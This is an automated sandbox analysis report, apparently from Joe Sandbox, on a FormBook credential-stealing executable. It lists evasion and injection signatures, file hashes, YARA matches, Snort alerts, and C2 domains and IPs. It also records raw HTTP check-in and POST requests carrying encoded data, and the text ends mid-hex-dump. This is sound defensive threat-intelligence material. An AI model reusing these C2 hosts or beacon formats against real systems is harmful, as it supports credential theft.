Windows Analysis Report
indent PWS-020199.exe

Overview

General Information

Sample name:	indent PWS-020199.exe
Analysis ID:	1465309
MD5:	66800cae69c4278c8a33921d624b7528
SHA1:	e3abc9476cde1dc7ca5a2baa546534d625c0d325
SHA256:	64874958438945a29c66851bb23bcb9483955577e941e156d559885cca4a6910
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://www.mareomnia.com/ya74/?dBOL8fg=

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: indent PWS-020199.exe

ReversingLabs: Detection: 68%

Yara detected FormBook

Source: Yara match	File source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: indent PWS-020199.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: indent PWS-020199.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: indent PWS-020199.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netiougc.pdbGCTL source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897417864.000000000063E000.00000002.00000001.01000000.0000000C.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2904164622.000000000063E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: WsRG.pdb source: indent PWS-020199.exe
Source:	Binary string: wntdll.pdbUGP source: indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: indent PWS-020199.exe, indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WsRG.pdbSHA256 source: indent PWS-020199.exe
Source:	Binary string: netiougc.pdb source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\netiougc.exe

Code function: 7_2_0322BF20 FindFirstFileW,FindNextFileW,FindClose,

7_2_0322BF20

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 4x nop then xor eax, eax	7_2_03219740
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 4x nop then pop edi	7_2_0321E11F
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 4x nop then pop edi	7_2_03222438
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 4x nop then pop edi	7_2_0322241D
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_038C0542

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 66.96.162.130:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 66.96.162.130:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 142.250.74.211:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 142.250.74.211:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 43.132.189.227:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 43.132.189.227:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.hellokong.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 66.96.162.130 66.96.162.130
Source: Joe Sandbox View	IP Address: 203.161.49.220 203.161.49.220

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: LILLY-ASUS LILLY-ASUS
Source: Joe Sandbox View	ASN Name: BIZLAND-SDUS BIZLAND-SDUS
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK HTTP/1.1Host: www.mareomnia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7w6o/?dBOL8fg=Iwh3SuFj0OMFYPToOdaCt8n09YMWVwcBCXZ5uIfRfjsROf0gJ1Ep/RQuBjSxRyYqk6VMa+wJUYkrYqg42OI1bOM95Oj9JPajS4UzxvnlYuQuHl4yeh0Z5Q8=&9Zed=oJfxPJMXK HTTP/1.1Host: www.netgain360.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ov93/?dBOL8fg=4u4yCo7OQPMCdKi2Ln8aiJAigi9vuRKQeDagcagOc8nEJXUOPucQWQe7OcI8vFTvM/uLBaUz+qY2H3sZqNwpjFxKCsR2JAuqbshkvfKiRYpiG9JChfURZOQ=&9Zed=oJfxPJMXK HTTP/1.1Host: www.hellokong.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jabf/?dBOL8fg=KGlDdtURhni7FGDH6yxlaDZJCfDxicUCgkjw8qWMo8hYydwJ4O2FhRAQ8quBHC5UmxGRc9Sg3+2UwlJVOzJUF0A3C6dQyjGkFiMq3W6NxA+1TkWWAbsUMwI=&9Zed=oJfxPJMXK HTTP/1.1Host: www.artvectorcraft.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /3mcu/?dBOL8fg=QfUAqqYGVyzbjiAj2dnUBJSNi+zHRF4Q6sDLQeB06Snd2Ev4mrer+JTsXVK5M0bFA+ayvTGmBhRWLdOOcrwm0o86bnORrWDNmfnIiMMD3+9d3oxlAeCDNso=&9Zed=oJfxPJMXK HTTP/1.1Host: www.eylmpwjot.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.xxikcn20.icu
Source: global traffic	DNS traffic detected: DNS query: www.mareomnia.com
Source: global traffic	DNS traffic detected: DNS query: www.netgain360.online
Source: global traffic	DNS traffic detected: DNS query: www.hellokong.xyz
Source: global traffic	DNS traffic detected: DNS query: www.artvectorcraft.store
Source: global traffic	DNS traffic detected: DNS query: www.eylmpwjot.store

Source: unknown

HTTP traffic detected: POST /7w6o/ HTTP/1.1Host: www.netgain360.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.netgain360.onlineContent-Length: 204Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.netgain360.online/7w6o/User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 64 42 4f 4c 38 66 67 3d 46 79 4a 58 52 62 31 78 2b 66 49 34 63 38 66 6d 57 2b 79 47 6c 64 50 42 2b 4a 77 4e 65 44 38 63 63 42 68 42 6f 59 69 62 66 52 6b 59 50 76 67 74 47 45 41 4c 2f 77 4e 54 44 6a 4b 63 64 57 31 39 69 35 52 65 63 75 49 73 52 72 59 4e 5a 64 6c 73 36 38 41 4c 66 63 46 67 39 63 50 55 45 49 7a 79 54 49 42 59 68 74 43 30 4c 6f 51 43 43 43 77 78 4c 51 30 61 37 44 54 79 72 37 78 70 79 4a 6e 69 45 4d 73 79 32 69 72 65 41 32 64 32 48 58 67 74 6b 32 33 65 34 5a 6d 34 69 6f 6a 4b 79 70 78 69 69 42 72 67 30 76 66 72 4f 45 68 72 50 58 2b 55 43 71 30 2f 58 41 44 33 77 6a 33 67 79 58 68 33 42 41 3d 3d Data Ascii: dBOL8fg=FyJXRb1x+fI4c8fmW+yGldPB+JwNeD8ccBhBoYibfRkYPvgtGEAL/wNTDjKcdW19i5RecuIsRrYNZdls68ALfcFg9cPUEIzyTIBYhtC0LoQCCCwxLQ0a7DTyr7xpyJniEMsy2ireA2d2HXgtk23e4Zm4iojKypxiiBrg0vfrOEhrPX+UCq0/XAD3wj3gyXh3BA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:04 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:06 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:09 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:11 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 